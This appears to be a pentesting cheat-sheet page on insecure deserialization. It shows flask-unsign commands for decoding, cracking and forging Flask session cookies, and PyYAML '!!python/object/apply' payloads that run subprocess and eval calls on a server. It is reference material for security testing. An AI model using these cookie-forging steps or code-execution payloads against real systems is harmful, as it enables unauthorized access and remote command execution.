Insecure Deserialization

Insecure Deserialization is a vulnerability that occurs when the deserialization process can be exploited to run malicious code.

Example CVEs

CVE-2021-33026 (Flask/Python)

An insure deserialization in Flask (Python) allowed a hacker to craft a malicious cookie with a command inside. When the cookie was deserialized, the command was executed by the server.

Cookies can be read without the secret key
Cookies can be forged with the secret key
kirsle flask cookie reader (Website)
See also: flask-session-manager (0.5k ⭐) or Flask Unsign (0.3k ⭐)

$ pip3 install flask-unsign[wordlist]
$ sudo ln -s /home/<xxx>/.local/bin/flask-unsign /usr/bin/flask-unsign
$ flask-unsign --decode --cookie 'cookie'        # decode
$ flask-unsign --unsign --cookie 'cookie'        # find key
$ flask-unsign --sign --cookie '' --secret 'dev' # encode

Yaml - Deserialization

PyYAML version 6 and below instanciated by default an insecure parser which could be exploited to run python code.

xxx: !!python/object/apply:time.sleep [2]

The xxx: is only necessary if a specific element (e.g., xxx) is rendered.

!!python/object/apply:builtins.range [1,10,1]
!!python/object/apply:subprocess.Popen ["ls"]
!!python/object/apply:subprocess.check_output [['ls', '-la']]
!!python/object/apply:builtins.eval [ "5" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess') or 'error'" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess').check_output(['ls', '-l']).decode('utf-8') or 'error'" ]

➡️ See also: python-deserialization-payload-generator (0.08k ⭐).

Insecure Deserialization ¶

Example CVEs ¶

CVE-2021-33026 (Flask/Python) ¶

Yaml - Deserialization ¶

Insecure Deserialization

Example CVEs

CVE-2021-33026 (Flask/Python)

Yaml - Deserialization